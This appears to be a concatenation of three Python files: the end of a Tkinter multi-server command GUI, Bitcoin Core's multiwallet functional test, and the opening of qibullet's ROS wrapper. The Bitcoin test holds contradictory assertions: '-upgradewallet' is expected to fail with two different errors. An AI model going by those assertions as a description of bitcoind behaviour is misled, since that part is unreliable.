command_frame.pack(side=TOP, fill=X)

# Load the pickled command history. On any parse failure, move the corrupt
# file aside (timestamped) and re-seed it with the default two commands.
# Using `with` also guarantees the handle is closed *before* the rename in
# the except path -- renaming a still-open file fails on Windows, which the
# original code did.
try:
    with open(gl.history_file, 'r') as history_file:
        gl.history_cmd = load(history_file)
except Exception:
    os.rename(gl.history_file, '%s_%s' % (gl.history_file, strftime("%Y-%m-%d_%H_%M")))
    with open(gl.history_file, 'w') as seed:
        seed.write('''(lp1
S'df -h'
p2
aS'ifconfig'
a.
''')
    # Fall back to the same defaults the seed file contains, so the
    # autocomplete entry below still receives a usable history list
    # (the original left gl.history_cmd unset on this path).
    gl.history_cmd = ['df -h', 'ifconfig']

entry = AutocompleteCombobox(command_frame)
entry.set_completion_list(gl.history_cmd)
entry.pack(fill=X)
# Confirm button
# NOTE(review): starts DISABLED; presumably re-enabled elsewhere once a
# server list is loaded -- confirm against the rest of the file.
command_but = Button(command_frame, text='OK', state=DISABLED, command=gexe_cmd)
command_but.pack(side=RIGHT)
# Button to pick the server-list file
file_but = Button(command_frame, text='select server list', command=open_list)
file_but.pack(side=LEFT)
# Results pane (command output) with a vertical scrollbar
text_frame = Frame(root, bd=2, relief=SUNKEN)
text_frame.pack(side=RIGHT, fill=BOTH, expand=YES)
text = Text(text_frame, insertbackground='green', fg='green')
scroll = Scrollbar(text_frame, command=text.yview)
text.configure(yscrollcommand=scroll.set)
scroll.pack(side=RIGHT, fill=Y)
text.pack(fill=BOTH, expand=YES)
# Server list container (checkbox rows are added elsewhere)
server_frame = Frame(root, bd=2, relief=SUNKEN)
server_frame.pack(side=LEFT, fill=Y)
def select_all():
    """Tick every server checkbox."""
    # Iterate the checkbutton widgets directly instead of indexing the
    # dict by key on every pass.
    for cbut in gl.cbuts.values():
        cbut.select()
def deselect_all():
    """Untick every server checkbox."""
    # Iterate the checkbutton widgets directly instead of indexing the
    # dict by key on every pass.
    for cbut in gl.cbuts.values():
        cbut.deselect()
def select_con():
    """Tick the boxes of connected servers, untick the rest."""
    # items() avoids the double dict lookup of the original key-based loop;
    # gl.cbuts and gl.server_all share the same keys (server names).
    for name, cbut in gl.cbuts.items():
        if gl.server_all[name].connect_status:
            cbut.select()
        else:
            cbut.deselect()
def deselect_reverse():
    """Invert the current checkbox selection."""
    # items() avoids the double dict lookup of the original key-based loop.
    for name, cbut in gl.cbuts.items():
        if gl.server_all[name].selected.get() == 1:
            cbut.deselect()
        else:
            cbut.select()
# Bulk-selection buttons arranged in a 2x2 grid above the server list
server_all_frame = Frame(server_frame, bd=2, relief=SUNKEN)
server_all_frame.pack(side=TOP)
Button(server_all_frame, text='all', command=select_all).grid(row=0, column=0, sticky='nesw')
Button(server_all_frame, text='none', command=deselect_all).grid(row=0, column=1, sticky='nesw')
Button(server_all_frame, text='just_connected', command=select_con).grid(row=1, column=0, sticky='nesw')
Button(server_all_frame, text='reverse', command=deselect_reverse).grid(row=1, column=1, sticky='nesw')
# Underlined font -- presumably applied to server labels elsewhere; confirm.
ft = Font(family='Fixdsys', size=11, weight=NORMAL, underline=1)
def listfunction(event):
    # Resize the canvas scroll region whenever the inner frame changes size,
    # so the scrollbar always covers the whole server list.
    canvas.configure(scrollregion=canvas.bbox("all"))
# Scrollable canvas holding one checkbox row per server (rows added elsewhere)
server_list_frame = Frame(server_frame, bd=2, relief=SUNKEN)
server_list_frame.pack(fill=Y, expand=YES)
canvas = Canvas(server_list_frame, width=150, height=500)
listframe = Frame(canvas)
myscrollbar = Scrollbar(server_list_frame, orient="vertical", command=canvas.yview)
canvas.configure(yscrollcommand=myscrollbar.set)
myscrollbar.pack(side="right", fill="y")
canvas.pack(side="left", fill=Y)
canvas.create_window((0, 0), window=listframe)
# Keep the scroll region in sync with the (growing) inner frame.
listframe.bind("<Configure>", listfunction)
# Connect / disconnect buttons
# NOTE(review): these assignments rebind the names `connect` and `disconnect`
# from the callback functions (captured via command=...) to the Button
# widgets; code elsewhere presumably toggles the buttons' state through
# these names -- confirm before renaming anything here.
connect = Button(command_frame, text='connect', state=DISABLED, command=connect)
connect.pack(side=LEFT)
disconnect = Button(command_frame, text='disconnect', state=DISABLED, command=disconnect)
disconnect.pack(side=LEFT)
# Limit on the number of worker threads
thread_num_label = Label(command_frame, text=' Max Threads: ')
thread_num_label.pack(side=LEFT)
thread_num_e = StringVar()
thread_num_entry = Entry(command_frame, textvariable=thread_num_e, width=5, insertbackground='green')
thread_num_e.set('10')
thread_num_entry.pack(side=LEFT)
# Right-click context menu actions
def save():
    """Ask for a target path and dump the whole results pane to it."""
    save_file = asksaveasfilename(initialdir='.')
    if save_file:
        # with-block flushes and closes the handle deterministically; the
        # original open(...).write(...) left closing to the garbage collector.
        with open(save_file, 'w') as out:
            out.write(text.get(0.0, END))
def clear():
    # Wipe the whole results pane.
    text.delete('0.0', END)
# Context menu shown on right-click inside the results pane.
# NOTE(review): this rebinds `menubar` (previously the top menu bar) to the
# context menu; the top bar was already installed via root.config above.
menubar = Menu(root)
menubar.add_command(label='save', command=save)
menubar.add_command(label='clear', command=clear)
def popup(event):  # show the context menu at the mouse position
    menubar.post(event.x_root, event.y_root)
text.bind('<Button-3>', popup)
# Append-mode command log; save_log is called elsewhere with chunks of output.
cmd_log = open(gl.logfile, 'a')
def save_log(log=''):
    # NOTE(review): writes are never explicitly flushed or closed here, so
    # log data may lag behind until interpreter exit.
    cmd_log.write(log)
def the_end(signum=None, frame=None):
    """Signal handler for SIGTERM/SIGINT.

    The original definition took no parameters, but Python invokes signal
    handlers as handler(signum, frame), so every delivered signal raised a
    TypeError. The defaults keep direct no-argument calls working too.
    """
    # cmd_log.close()
    print('the end')
# Install the shutdown handler for termination signals and enter the Tk loop.
signal(SIGTERM, the_end)
signal(SIGINT, the_end)
root.mainloop()
# Script entry point; main() is defined earlier in the file.
if __name__ == '__main__':
    main()
|
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
# Module-level flag shared by the concurrent loader threads: set once any
# thread observes the "already being loaded" race.
got_loading_error = False


def test_load_unload(node, name):
    """Repeatedly load/unload wallet `name` until a concurrent-loading
    error is observed (or ten attempts have been made)."""
    global got_loading_error
    for _ in range(10):
        # Another thread may already have hit the race; stop early.
        if got_loading_error:
            break
        try:
            node.loadwallet(name)
            node.unloadwallet(name)
        except JSONRPCException as e:
            hit_race = (e.error['code'] == -4
                        and 'Wallet already being loading' in e.error['message'])
            if hit_race:
                got_loading_error = True
                break
            # Any other JSONRPCException is swallowed and the loop retried,
            # matching the original behaviour.
class MultiWalletTest(BitcoinTestFramework):
    """Exercise multiwallet support: creating, loading, unloading, listing
    and backing up several wallets on a single bitcoind node, plus the
    startup error paths for bad -wallet/-walletdir configurations."""

    def set_test_params(self):
        # Fresh chain so the generated balances asserted below are exact.
        self.setup_clean_chain = True
        self.num_nodes = 2
        self.rpc_timeout = 120
        self.extra_args = [["-nowallet"], []]

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def add_options(self, parser):
        parser.add_argument(
            '--data_wallets_dir',
            default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
            help='Test data with wallet directories (default: %(default)s)',
        )

    def run_test(self):
        node = self.nodes[0]

        # Path helpers rooted at node 0's datadir / wallet dir.
        data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
        wallet_dir = lambda *p: data_dir('wallets', *p)
        wallet = lambda name: node.get_wallet_rpc(name)

        def wallet_file(name):
            # Resolve a wallet name to the on-disk wallet data file:
            # default wallet and directory wallets keep the data file inside
            # a subdirectory; plain-file wallets are the path itself.
            if name == self.default_wallet_name:
                return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
            if os.path.isdir(wallet_dir(name)):
                return wallet_dir(name, "wallet.dat")
            return wallet_dir(name)

        assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': self.default_wallet_name }] })

        # check wallet.dat is created
        self.stop_nodes()
        assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)

        # create symlink to verify wallet directory path can be referenced
        # through symlink
        os.mkdir(wallet_dir('w7'))
        os.symlink('w7', wallet_dir('w7_symlink'))

        # Pathological symlinks exercised by the listwalletdir scan below.
        os.symlink('..', wallet_dir('recursive_dir_symlink'))

        os.mkdir(wallet_dir('self_walletdat_symlink'))
        os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))

        # rename wallet.dat to make sure plain wallet file paths (as opposed to
        # directory paths) can be loaded
        # create another dummy wallet for use in testing backups later
        self.start_node(0)
        node.createwallet("empty")
        node.createwallet("plain")
        node.createwallet("created")
        self.stop_nodes()
        empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
        os.rename(wallet_file("empty"), empty_wallet)
        shutil.rmtree(wallet_dir("empty"))
        empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
        os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
        shutil.rmtree(wallet_dir("created"))
        os.rename(wallet_file("plain"), wallet_dir("w8"))
        shutil.rmtree(wallet_dir("plain"))

        # restart node with a mix of wallet names:
        #   w1, w2, w3 - to verify new wallets created when non-existing paths specified
        #   w          - to verify wallet name matching works when one wallet path is prefix of another
        #   sub/w5     - to verify relative wallet path is created correctly
        #   extern/w6  - to verify absolute wallet path is created correctly
        #   w7_symlink - to verify symlinked wallet path is initialized correctly
        #   w8         - to verify existing wallet file is loaded correctly. Not
        #                tested for SQLite wallets as this is a deprecated BDB behavior.
        #   ''         - to verify default wallet file is created correctly
        to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
        in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create]  # Wallets in the wallet dir
        in_wallet_dir.append('w7')  # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
        to_create.append(os.path.join(self.options.tmpdir, 'extern/w6'))  # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
        to_load = [self.default_wallet_name]
        if not self.options.descriptors:
            to_load.append('w8')
        wallet_names = to_create + to_load  # Wallet names loaded in the wallet
        in_wallet_dir += to_load  # The loaded wallets are also in the wallet dir

        self.start_node(0)
        for wallet_name in to_create:
            self.nodes[0].createwallet(wallet_name)
        for wallet_name in to_load:
            self.nodes[0].loadwallet(wallet_name)

        # An unreadable directory must not abort the wallet-dir scan.
        os.mkdir(wallet_dir('no_access'))
        os.chmod(wallet_dir('no_access'), 0)
        try:
            with self.nodes[0].assert_debug_log(expected_msgs=['Too many levels of symbolic links', 'Error scanning']):
                walletlist = self.nodes[0].listwalletdir()['wallets']
        finally:
            # Need to ensure access is restored for cleanup
            os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
        assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))

        assert_equal(set(node.listwallets()), set(wallet_names))

        # should raise rpc error if wallet path can't be created
        err_code = -4 if self.options.descriptors else -1
        assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")

        # check that all requested wallets were created
        self.stop_node(0)
        for wallet_name in wallet_names:
            assert_equal(os.path.isfile(wallet_file(wallet_name)), True)

        # Startup failures for bad -walletdir values.
        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
        self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())

        # Duplicate -wallet arguments are ignored with a warning, not fatal.
        self.start_node(0, ['-wallet=w1', '-wallet=w1'])
        self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')

        if not self.options.descriptors:
            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # should not initialize if one wallet is a copy of another
            shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
            in_wallet_dir.append('w8_copy')
            exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
            self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

            # should not initialize if wallet file is a symlink
            os.symlink('w8', wallet_dir('w8_symlink'))
            self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)

        # should not initialize if the specified walletdir does not exist
        self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
        # should not initialize if the specified walletdir is not a directory
        not_a_dir = wallet_dir('notadir')
        open(not_a_dir, 'a', encoding="utf8").close()
        self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')

        self.log.info("Do not allow -upgradewallet with multiwallet")
        self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")

        self.log.info("Do not allow -zapwallettxes with multiwallet")
        self.assert_start_raises_init_error(0, ['-zapwallettxes', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
        self.assert_start_raises_init_error(0, ['-zapwallettxes=1', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
        self.assert_start_raises_init_error(0, ['-zapwallettxes=2', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")

        self.log.info("Do not allow -salvagewallet with multiwallet")
        self.assert_start_raises_init_error(0, ['-salvagewallet', '-wallet=w1', '-wallet=w2'], "Error: -salvagewallet is only allowed with a single wallet file")
        self.assert_start_raises_init_error(0, ['-salvagewallet=1', '-wallet=w1', '-wallet=w2'], "Error: -salvagewallet is only allowed with a single wallet file")

        self.log.info("Do not allow -upgradewallet with multiwallet")
        self.assert_start_raises_init_error(0, ['-upgradewallet', '-wallet=w1', '-wallet=w2'], "Error: -upgradewallet is only allowed with a single wallet file")
        self.assert_start_raises_init_error(0, ['-upgradewallet=1', '-wallet=w1', '-wallet=w2'], "Error: -upgradewallet is only allowed with a single wallet file")

        # if wallets/ doesn't exist, datadir should be the default wallet dir
        wallet_dir2 = data_dir('walletdir')
        os.rename(wallet_dir(), wallet_dir2)
        self.start_node(0)
        self.nodes[0].createwallet("w4")
        self.nodes[0].createwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        node.generatetoaddress(nblocks=1, address=w5.getnewaddress())

        # now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
        os.rename(wallet_dir2, wallet_dir())
        self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
        self.nodes[0].loadwallet("w4")
        self.nodes[0].loadwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        w5_info = w5.getwalletinfo()
        assert_equal(w5_info['immature_balance'], 50)

        # Two nodes must not be able to share one wallet directory.
        competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
        os.mkdir(competing_wallet_dir)
        self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
        self.nodes[0].createwallet(self.default_wallet_name)
        if self.options.descriptors:
            exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?"
        else:
            exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
        self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

        self.restart_node(0)
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        wallets = [wallet(w) for w in wallet_names]
        wallet_bad = wallet("bad")

        # check wallet names and balances
        node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
        # NOTE(review): this loop rebinds the local name `wallet` (previously
        # the lambda helper above) to each RPC proxy; the helper is not used
        # again afterwards, so this is harmless but fragile.
        for wallet_name, wallet in zip(wallet_names, wallets):
            info = wallet.getwalletinfo()
            assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
            assert_equal(info['walletname'], wallet_name)

        # accessing invalid wallet fails
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)

        # accessing wallet RPC without using wallet endpoint fails
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)

        w1, w2, w3, w4, *_ = wallets
        node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
        assert_equal(w1.getbalance(), 100)
        assert_equal(w2.getbalance(), 0)
        assert_equal(w3.getbalance(), 0)
        assert_equal(w4.getbalance(), 0)

        # Cross-wallet sends and the resulting balances.
        w1.sendtoaddress(w2.getnewaddress(), 1)
        w1.sendtoaddress(w3.getnewaddress(), 2)
        w1.sendtoaddress(w4.getnewaddress(), 3)
        node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
        assert_equal(w2.getbalance(), 1)
        assert_equal(w3.getbalance(), 2)
        assert_equal(w4.getbalance(), 3)

        # Batch RPC requests go to the wallet endpoint of the proxy used.
        batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
        assert_equal(batch[0]["result"]["chain"], self.chain)
        assert_equal(batch[1]["result"]["walletname"], "w1")

        self.log.info('Check for per-wallet settxfee call')
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], 0)
        w2.settxfee(0.001)
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))

        self.log.info("Test dynamic wallet loading")

        self.restart_node(0, ['-nowallet'])
        assert_equal(node.listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)

        self.log.info("Load first wallet")
        loadwallet_name = node.loadwallet(wallet_names[0])
        assert_equal(loadwallet_name['name'], wallet_names[0])
        assert_equal(node.listwallets(), wallet_names[0:1])
        node.getwalletinfo()
        w1 = node.get_wallet_rpc(wallet_names[0])
        w1.getwalletinfo()

        self.log.info("Load second wallet")
        loadwallet_name = node.loadwallet(wallet_names[1])
        assert_equal(loadwallet_name['name'], wallet_names[1])
        assert_equal(node.listwallets(), wallet_names[0:2])
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
        w2 = node.get_wallet_rpc(wallet_names[1])
        w2.getwalletinfo()

        self.log.info("Concurrent wallet loading")
        # Three threads race load/unload of the same wallet; at least one
        # must observe the "already being loaded" error (module-level flag).
        threads = []
        for _ in range(3):
            n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
            t = Thread(target=test_load_unload, args=(n, wallet_names[2], ))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        global got_loading_error
        assert_equal(got_loading_error, True)

        self.log.info("Load remaining wallets")
        for wallet_name in wallet_names[2:]:
            loadwallet_name = self.nodes[0].loadwallet(wallet_name)
            assert_equal(loadwallet_name['name'], wallet_name)

        assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))

        # Fail to load if wallet doesn't exist
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')

        # Fail to load duplicate wallets
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
        if self.options.descriptors:
            assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?", self.nodes[0].loadwallet, wallet_names[0])
        else:
            assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])

            # This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
            # Fail to load duplicate wallets by different ways (directory and filepath)
            path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
            assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')

            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # Fail to load if one wallet is a copy of another
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if wallet file is a symlink
            assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')

        # Fail to load if a directory is specified that doesn't contain a wallet
        os.mkdir(wallet_dir('empty_wallet_dir'))
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')

        self.log.info("Test dynamic wallet creation.")
        # Fail to create a wallet if it already exists.
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
        assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')

        # Successfully create a wallet with a new name
        loadwallet_name = self.nodes[0].createwallet('w9')
        in_wallet_dir.append('w9')
        assert_equal(loadwallet_name['name'], 'w9')
        w9 = node.get_wallet_rpc('w9')
        assert_equal(w9.getwalletinfo()['walletname'], 'w9')

        assert 'w9' in self.nodes[0].listwallets()

        # Successfully create a wallet using a full path
        new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
        new_wallet_name = os.path.join(new_wallet_dir, 'w10')
        loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
        assert_equal(loadwallet_name['name'], new_wallet_name)
        w10 = node.get_wallet_rpc(new_wallet_name)
        assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)

        assert new_wallet_name in self.nodes[0].listwallets()

        self.log.info("Test dynamic wallet unloading")

        # Test `unloadwallet` errors
        assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
        assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w2"),
        assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w1"),

        # Successfully unload the specified wallet name
        self.nodes[0].unloadwallet("w1")
        assert 'w1' not in self.nodes[0].listwallets()

        # Successfully unload the wallet referenced by the request endpoint
        # Also ensure unload works during walletpassphrase timeout
        w2.encryptwallet('test')
        w2.walletpassphrase('test', 1)
        w2.unloadwallet()
        time.sleep(1.1)
        assert 'w2' not in self.nodes[0].listwallets()

        # Successfully unload all wallets
        for wallet_name in self.nodes[0].listwallets():
            self.nodes[0].unloadwallet(wallet_name)
        assert_equal(self.nodes[0].listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)

        # Successfully load a previously unloaded wallet
        self.nodes[0].loadwallet('w1')
        assert_equal(self.nodes[0].listwallets(), ['w1'])
        assert_equal(w1.getwalletinfo()['walletname'], 'w1')

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        # Test backing up and restoring wallets
        self.log.info("Test wallet backup")
        self.restart_node(0, ['-nowallet'])
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)
        for wallet_name in wallet_names:
            rpc = self.nodes[0].get_wallet_rpc(wallet_name)
            addr = rpc.getnewaddress()
            backup = os.path.join(self.options.tmpdir, 'backup.dat')
            if os.path.exists(backup):
                os.unlink(backup)
            rpc.backupwallet(backup)
            # Swap in an empty wallet: the address must no longer be ours.
            self.nodes[0].unloadwallet(wallet_name)
            shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
            # Restore from the backup: the address is ours again.
            self.nodes[0].unloadwallet(wallet_name)
            shutil.copyfile(backup, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], True)

        # Test .walletlock file is closed
        self.start_node(1)
        wallet = os.path.join(self.options.tmpdir, 'my_wallet')
        self.nodes[0].createwallet(wallet)
        if self.options.descriptors:
            assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
        else:
            assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
        self.nodes[0].unloadwallet(wallet)
        self.nodes[1].loadwallet(wallet)
# Standard functional-test entry point.
if __name__ == '__main__':
    MultiWalletTest().main()
|
ros_wrapper.py | #!/usr/bin/env python
# coding: utf-8
import os
import sys
import atexit
import pybullet
from qibullet.camera import Camera
from qibullet.camera import CameraRgb
from qibullet.camera import CameraDepth
from qibullet.nao_virtual import NaoVirtual
from qibullet.romeo_virtual import RomeoVirtual
from qibullet.pepper_virtual import PepperVirtual
from qibullet.base_controller import PepperBaseController
from threading import Thread
# The ROS-side dependencies are optional: if any import fails, record the
# error message in MISSING_IMPORT and let RosWrapper.__init__ raise it
# lazily, so the pure-pybullet parts of qibullet keep working without ROS.
try:
    import rospy
    import roslib
    import roslaunch
    import tf2_ros
    from cv_bridge import CvBridge
    from sensor_msgs.msg import Image
    from sensor_msgs.msg import CameraInfo
    from sensor_msgs.msg import JointState
    from sensor_msgs.msg import LaserScan
    from std_msgs.msg import Header
    from std_msgs.msg import Empty
    from naoqi_bridge_msgs.msg import JointAnglesWithSpeed
    from geometry_msgs.msg import TransformStamped
    from geometry_msgs.msg import Twist
    from nav_msgs.msg import Odometry

    # Prefer the forked NAOqi driver message (pose with a speed field);
    # fall back to the official geometry_msgs PoseStamped when unavailable.
    try:
        from naoqi_bridge_msgs.msg import PoseStampedWithSpeed as MovetoPose
        OFFICIAL_DRIVER = False
        print("Using softbankrobotics-research forked version of NAOqi driver")
    except ImportError as e:
        from geometry_msgs.msg import PoseStamped as MovetoPose
        OFFICIAL_DRIVER = True

    # All ROS imports succeeded.
    MISSING_IMPORT = None

except ImportError as e:
    # Remember the failure; RosWrapper.__init__ re-raises it on first use.
    MISSING_IMPORT = str(e)
class RosWrapper:
"""
Virtual class defining the basis of a robot ROS wrapper
"""
def __init__(self):
    """
    Constructor. Raises a pybullet error if the ROS-side imports
    (rospy, cv_bridge, tf2_ros, ...) failed at module load time.
    """
    if MISSING_IMPORT is not None:
        # Re-raise the import failure recorded when the module was loaded.
        raise pybullet.error(MISSING_IMPORT)

    self.spin_thread = None  # Thread running _spin(); created in launchWrapper
    self._wrapper_termination = False  # Set to True to stop the spin loop
    self.image_bridge = CvBridge()  # Converts OpenCV frames to ROS Image msgs
    self.roslauncher = None  # roslaunch handle for robot_state_publisher
    self.transform_broadcaster = tf2_ros.TransformBroadcaster()
    # Ensure the spin thread and roslaunch are cleaned up at interpreter exit.
    atexit.register(self.stopWrapper)
def stopWrapper(self):
"""
Stops the ROS wrapper
"""
self._wrapper_termination = True
try:
assert self.spin_thread is not None
assert isinstance(self.spin_thread, Thread)
assert self.spin_thread.isAlive()
self.spin_thread.join()
except AssertionError:
pass
if self.roslauncher is not None:
self.roslauncher.stop()
print("Stopping roslauncher")
def launchWrapper(self, virtual_robot, ros_namespace, frequency=200):
    """
    Launches the ROS wrapper

    Parameters:
        virtual_robot - The instance of the simulated model
        ros_namespace - The ROS namespace to be added before the ROS topics
            advertized and subscribed
        frequency - The frequency of the ROS rate that will be used to pace
            the wrapper's main loop
    """
    if MISSING_IMPORT is not None:
        # ROS imports failed at module load; surface that error now.
        raise pybullet.error(MISSING_IMPORT)

    self.robot = virtual_robot
    self.ros_namespace = ros_namespace
    self.frequency = frequency

    rospy.init_node(
        "qibullet_wrapper",
        anonymous=True,
        disable_signals=False)

    # Upload the robot description to the ros parameter server
    try:
        if isinstance(self.robot, PepperVirtual):
            robot_name = "pepper"
        elif isinstance(self.robot, NaoVirtual):
            robot_name = "nao"
